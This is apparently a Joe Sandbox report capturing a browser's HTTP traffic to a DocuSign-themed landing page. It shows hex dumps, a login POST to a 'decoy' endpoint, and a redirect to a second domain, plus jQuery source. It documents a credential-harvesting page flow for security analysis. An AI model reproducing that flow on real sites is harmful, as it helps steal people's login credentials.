2024-12-27 09:32:26 UTC	14243	IN	Data Raw: 61 74 61 54 79 70 65 73 3b 77 68 69 6c 65 28 22 2a 22 3d 3d 3d 69 5b 30 5d 29 69 2e 73 68 69 66 74 28 29 2c 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 61 2e 6d 69 6d 65 54 79 70 65 7c 7c 62 2e 67 65 74 52 65 73 70 6f 6e 73 65 48 65 61 64 65 72 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 29 29 3b 69 66 28 65 29 66 6f 72 28 67 20 69 6e 20 68 29 69 66 28 68 5b 67 5d 26 26 68 5b 67 5d 2e 74 65 73 74 28 65 29 29 7b 69 2e 75 6e 73 68 69 66 74 28 67 29 3b 62 72 65 61 6b 7d 69 66 28 69 5b 30 5d 69 6e 20 63 29 66 3d 69 5b 30 5d 3b 65 6c 73 65 7b 66 6f 72 28 67 20 69 6e 20 63 29 7b 69 66 28 21 69 5b 30 5d 7c 7c 61 2e 63 6f 6e 76 65 72 74 65 72 73 5b 67 2b 22 20 22 2b 69 5b 30 5d 5d 29 7b 66 3d 67 3b 62 72 65 61 6b 7d 64 7c 7c 28 64 3d 67 29 7d 66 3d 66 7c 7c 64 Data Ascii: ataTypes;while("*"===i[0])i.shift(),void 0===e&&(e=a.mimeType\|\|b.getResponseHeader("Content-Type"));if(e)for(g in h)if(h[g]&&h[g].test(e)){i.unshift(g);break}if(i[0]in c)f=i[0];else{for(g in c){if(!i[0]\|\|a.converters[g+" "+i[0]]){f=g;break}d\|\|(d=g)}f=f\|\|d

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:26 UTC	711	OUT	POST /api/landingPage/web_interaction HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive Content-Length: 76 sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Type: application/json Accept: / Origin: https://online-ops.mypasschange.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:26 UTC	76	OUT	Data Raw: 7b 22 67 75 69 64 22 3a 22 66 62 62 30 35 35 39 65 62 65 31 39 31 31 65 66 62 35 33 63 30 32 34 32 61 63 31 39 30 31 30 32 22 2c 22 73 74 65 70 5f 69 64 22 3a 22 32 22 2c 22 71 72 5f 72 65 71 75 65 73 74 22 3a 66 61 6c 73 65 7d Data Ascii: {"guid":"fbb0559ebe1911efb53c0242ac190102","step_id":"2","qr_request":false}
2024-12-27 09:32:27 UTC	330	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close X-Frame-Options: SAMEORIGIN Vary: origin, Cookie Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:26 UTC	734	OUT	GET /static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:27 UTC	356	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:27 GMT Content-Type: image/png Content-Length: 335 Last-Modified: Sun, 04 Jul 2021 12:23:36 GMT Connection: close ETag: "60e1a848-14f" Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Accept-Ranges: bytes
2024-12-27 09:32:27 UTC	335	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 d0 00 00 00 96 04 03 00 00 00 74 b0 0e b5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 30 50 4c 54 45 1b 49 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 2b 22 18 00 00 00 09 70 48 59 73 00 00 0e c1 00 00 0e c1 01 b8 91 6b ed 00 00 00 a8 49 44 41 54 78 da ed c1 01 01 00 00 00 82 20 ff af 6e 48 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: PNGIHDRtsRGBgAMAa0PLTEI+"pHYskIDATx nH@

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:27 UTC	725	OUT	GET /static/images/phishing/DocusignDigitallySignDocument/landingPage/login-form.png HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:28 UTC	358	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:28 GMT Content-Type: image/png Content-Length: 9364 Last-Modified: Wed, 01 Jun 2022 12:19:23 GMT Connection: close ETag: "6297594b-2494" Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Accept-Ranges: bytes
2024-12-27 09:32:28 UTC	9364	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 4b 00 00 01 0e 08 02 00 00 00 d7 2c 1b d7 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c0 00 00 0e c0 01 6a d6 89 09 00 00 24 29 49 44 41 54 78 5e ed dd 0f 74 13 d7 a1 e7 f1 31 36 b2 9d d8 24 a9 1d 82 cd 1f 8b 4d 2a a7 2d 6a b7 35 69 2b 93 2c a6 7f 64 7a 62 d3 2d 22 6d 0c e9 c3 79 67 1f b4 59 9c cd c1 39 4d e0 b5 07 38 0d a6 4d 71 5e 36 66 9b 42 5e 0e 26 0d b8 7d 0f 93 06 3b 09 b8 ed 22 da 62 a7 2f e8 74 17 c1 36 56 53 90 09 d8 09 d8 84 20 13 db e2 8f f7 ce 1f 59 b2 2c 19 d9 92 f8 73 f3 fd 54 15 73 47 d2 cc dc 99 1b eb e7 7b 67 c6 29 83 83 83 0a 00 00 00 24 32 c1 f8 17 00 00 00 b2 20 e1 01 00 00 c8 86 84 07 00 00 20 1b 12 1e Data Ascii: PNGIHDRK,sRGBgAMAapHYsj$)IDATx^t16$M*-j5i+,dzb-"mygY9M8Mq^6fB^&};"b/t6VS Y,sTsG{g)$2

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:28 UTC	439	OUT	GET /static/images/phishing/DocusignDigitallySignDocument/landingPage/docusign_background.png HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:29 UTC	356	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:29 GMT Content-Type: image/png Content-Length: 335 Last-Modified: Sun, 04 Jul 2021 12:23:36 GMT Connection: close ETag: "60e1a848-14f" Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Accept-Ranges: bytes
2024-12-27 09:32:29 UTC	335	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 d0 00 00 00 96 04 03 00 00 00 74 b0 0e b5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 30 50 4c 54 45 1b 49 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 2b 22 18 00 00 00 09 70 48 59 73 00 00 0e c1 00 00 0e c1 01 b8 91 6b ed 00 00 00 a8 49 44 41 54 78 da ed c1 01 01 00 00 00 82 20 ff af 6e 48 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: PNGIHDRtsRGBgAMAa0PLTEI+"pHYskIDATx nH@

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 85

Chrome Cache Entry: 86

Chrome Cache Entry: 87

Chrome Cache Entry: 88

Chrome Cache Entry: 89

Chrome Cache Entry: 90

Chrome Cache Entry: 91

Chrome Cache Entry: 92

Chrome Cache Entry: 93

Chrome Cache Entry: 94

Chrome Cache Entry: 95

Chrome Cache Entry: 96

Chrome Cache Entry: 97

Chrome Cache Entry: 98

Chrome Cache Entry: 99

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:28 UTC	382	OUT	GET /api/landingPage/web_interaction HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:29 UTC	209	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Fri, 27 Dec 2024 09:32:29 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close X-Frame-Options: SAMEORIGIN Vary: origin, Cookie

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:29 UTC	657	OUT	GET /favicon.ico HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:30 UTC	143	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 27 Dec 2024 09:32:29 GMT Content-Type: text/html Content-Length: 548 Connection: close
2024-12-27 09:32:30 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:40 UTC	769	OUT	POST /api/v2/decoy/web/login HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive Content-Length: 158 sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" Accept: / Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://online-ops.mypasschange.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:40 UTC	158	OUT	Data Raw: 7b 22 70 61 73 73 77 6f 72 64 22 3a 5b 7b 22 70 61 73 73 77 6f 72 64 22 3a 22 53 74 72 6f 6e 67 22 7d 5d 2c 22 75 6e 66 6f 72 6d 61 74 74 65 64 22 3a 5b 7b 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 7d 2c 7b 22 75 6e 64 65 66 69 6e 65 64 22 3a 22 22 7d 2c 7b 22 75 6e 64 65 66 69 6e 65 64 22 3a 22 22 7d 5d 2c 22 67 75 69 64 22 3a 22 66 62 62 30 35 35 39 65 62 65 31 39 31 31 65 66 62 35 33 63 30 32 34 32 61 63 31 39 30 31 30 32 22 2c 22 73 74 65 70 5f 69 64 22 3a 22 32 22 7d Data Ascii: {"password":[{"password":"Strong"}],"unformatted":[{"username":""},{"undefined":""},{"undefined":""}],"guid":"fbb0559ebe1911efb53c0242ac190102","step_id":"2"}
2024-12-27 09:32:40 UTC	316	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:40 GMT Content-Type: application/json Content-Length: 107 Connection: close X-Frame-Options: SAMEORIGIN Vary: origin Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block
2024-12-27 09:32:40 UTC	107	IN	Data Raw: 7b 22 72 65 64 69 72 65 63 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 2d 64 69 72 65 63 74 6f 72 79 2e 6e 65 74 2d 6c 69 6e 6b 2d 73 65 63 75 72 65 2e 63 6f 6d 2f 6c 61 6e 64 69 6e 67 50 61 67 65 2f 33 2f 66 62 62 30 35 35 39 65 62 65 31 39 31 31 65 66 62 35 33 63 30 32 34 32 61 63 31 39 30 31 30 32 22 7d Data Ascii: {"redirect": "https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102"}

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:42 UTC	373	OUT	GET /api/v2/decoy/web/login HTTP/1.1 Host: online-ops.mypasschange.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:42 UTC	199	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 27 Dec 2024 09:32:42 GMT Content-Type: text/html; charset=utf-8 Content-Length: 9 Connection: close X-Frame-Options: SAMEORIGIN Vary: origin
2024-12-27 09:32:42 UTC	9	IN	Data Raw: 46 6f 72 62 69 64 64 65 6e Data Ascii: Forbidden

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:42 UTC	779	OUT	GET /landingPage/3/fbb0559ebe1911efb53c0242ac190102 HTTP/1.1 Host: secure-directory.net-link-secure.com Connection: keep-alive sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://online-ops.mypasschange.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:43 UTC	326	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:43 GMT Content-Type: text/html; charset=utf-8 Content-Length: 10199 Connection: close X-Frame-Options: SAMEORIGIN Vary: origin Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block
2024-12-27 09:32:43 UTC	10199	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 0a 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6c 69 62 2f 6a 71 75 65 72 79 2d 31 2e 31 31 2e 31 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 0a 09 0a 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6c 69 62 2f 70 61 73 73 77 6f 72 64 2d 6d 65 74 65 72 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d Data Ascii: <!DOCTYPE HTML PUBLIC><html><head><meta charset="utf-8"><script src="/static/lib/jquery-1.11.1.min.js" type="text/javascript"></script><script src="/static/lib/password-meter.js" type="text/javascript"></script><link rel="stylesheet" href=

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:44 UTC	648	OUT	GET /static/css/landing/landing.css HTTP/1.1 Host: secure-directory.net-link-secure.com Connection: keep-alive sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:45 UTC	355	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:45 GMT Content-Type: text/css Content-Length: 526 Last-Modified: Sun, 30 May 2021 15:57:14 GMT Connection: close ETag: "60b3b5da-20e" Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Accept-Ranges: bytes
2024-12-27 09:32:45 UTC	526	IN	Data Raw: 23 73 75 63 63 65 73 73 2d 64 69 61 6c 6f 67 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 34 30 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 32 30 30 70 78 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 0d 0a 20 20 20 20 74 6f 70 3a 20 32 35 25 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 30 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 3b 0d 0a 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 Data Ascii: #success-dialog { position: absolute; display: none; width: 400px; height: 200px; z-index: 9999; top: 25%; background:white; border: 1px solid black; -webkit-box-shadow:0 0 10px rgba(0,0,0,0.4); -moz-box-s

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:46 UTC	391	OUT	GET /static/lib/jquery-1.11.1.min.js HTTP/1.1 Host: secure-directory.net-link-secure.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:46 UTC	373	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:46 GMT Content-Type: application/javascript Content-Length: 95790 Last-Modified: Sun, 30 May 2021 15:57:16 GMT Connection: close ETag: "60b3b5dc-1762e" Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Accept-Ranges: bytes
2024-12-27 09:32:46 UTC	16011	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 31 2e 31 31 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 34 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 Data Ascii: /! jQuery v1.11.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a wi
2024-12-27 09:32:46 UTC	16384	IN	Data Raw: 3d 68 28 61 2e 72 65 70 6c 61 63 65 28 52 2c 22 24 31 22 29 29 3b 72 65 74 75 72 6e 20 64 5b 75 5d 3f 68 62 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 65 29 7b 76 61 72 20 66 2c 67 3d 64 28 61 2c 6e 75 6c 6c 2c 65 2c 5b 5d 29 2c 68 3d 61 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 68 2d 2d 29 28 66 3d 67 5b 68 5d 29 26 26 28 61 5b 68 5d 3d 21 28 62 5b 68 5d 3d 66 29 29 7d 29 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 62 5b 30 5d 3d 61 2c 64 28 62 2c 6e 75 6c 6c 2c 66 2c 63 29 2c 21 63 2e 70 6f 70 28 29 7d 7d 29 2c 68 61 73 3a 68 62 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 66 62 28 61 2c 62 29 2e 6c 65 6e 67 74 68 3e 30 7d 7d 29 2c 63 6f 6e 74 61 69 Data Ascii: =h(a.replace(R,"$1"));return d[u]?hb(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),!c.pop()}}),has:hb(function(a){return function(b){return fb(a,b).length>0}}),contai
2024-12-27 09:32:46 UTC	16384	IN	Data Raw: 6a 5b 6b 5d 2e 64 61 74 61 2c 62 29 29 2c 67 3d 6a 5b 6b 5d 2c 65 7c 7c 28 67 2e 64 61 74 61 7c 7c 28 67 2e 64 61 74 61 3d 7b 7d 29 2c 67 3d 67 2e 64 61 74 61 29 2c 76 6f 69 64 20 30 21 3d 3d 64 26 26 28 67 5b 6d 2e 63 61 6d 65 6c 43 61 73 65 28 62 29 5d 3d 64 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 3f 28 66 3d 67 5b 62 5d 2c 6e 75 6c 6c 3d 3d 66 26 26 28 66 3d 67 5b 6d 2e 63 61 6d 65 6c 43 61 73 65 28 62 29 5d 29 29 3a 66 3d 67 2c 66 7d 7d 66 75 6e 63 74 69 6f 6e 20 52 28 61 2c 62 2c 63 29 7b 69 66 28 6d 2e 61 63 63 65 70 74 44 61 74 61 28 61 29 29 7b 76 61 72 20 64 2c 65 2c 66 3d 61 2e 6e 6f 64 65 54 79 70 65 2c 67 3d 66 3f 6d 2e 63 61 63 68 65 3a 61 2c 68 3d 66 3f 61 5b 6d 